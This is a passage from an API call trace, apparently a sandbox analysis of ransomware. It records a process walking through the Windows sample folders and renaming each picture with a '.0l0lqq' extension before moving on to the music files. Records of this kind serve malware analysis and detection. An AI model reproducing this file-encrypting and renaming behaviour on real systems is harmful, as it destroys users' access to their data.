lpOldMode=0x26dd00) returned 1 [0247.285] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.0l0lqq")) returned 1 [0247.291] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.291] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.291] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.291] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.292] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0247.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0247.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0247.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0247.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.296] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0247.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0247.371] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpFilePart=0x0) returned 0x32 [0247.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0247.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0247.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0247.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0247.399] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.0l0lqq")) returned 1 [0247.404] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpFilePart=0x0) returned 0x37 [0247.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0247.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.408] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpFilePart=0x0) returned 0x37 [0247.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0247.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0247.453] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpFilePart=0x0) returned 0x37 [0247.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0247.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0247.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0247.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0247.468] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.0l0lqq")) returned 1 [0247.473] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpFilePart=0x0) returned 0x35 [0247.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.475] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpFilePart=0x0) returned 0x35 [0247.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0247.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0247.530] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpFilePart=0x0) returned 0x35 [0247.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0247.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0247.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0247.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0247.555] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.0l0lqq")) returned 1 [0247.561] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpFilePart=0x0) returned 0x33 [0247.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0247.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0247.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0247.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0247.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0247.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0247.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0247.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0247.564] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpFilePart=0x0) returned 0x33 [0247.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0247.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0247.650] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpFilePart=0x0) returned 0x33 [0247.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0247.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0247.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0247.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0247.671] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.0l0lqq" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.0l0lqq")) returned 1 [0247.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0247.677] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0247.677] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0247.677] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0247.678] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0247.678] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0247.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0247.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0247.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0247.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0247.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0247.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0247.679] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0247.680] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0247.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0247.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0247.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0247.682] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0247.683] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0247.683] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0247.683] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3", cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0247.683] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0247.684] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 0 [0247.684] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0247.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0247.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0247.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0247.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0247.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0247.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0247.686] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3", 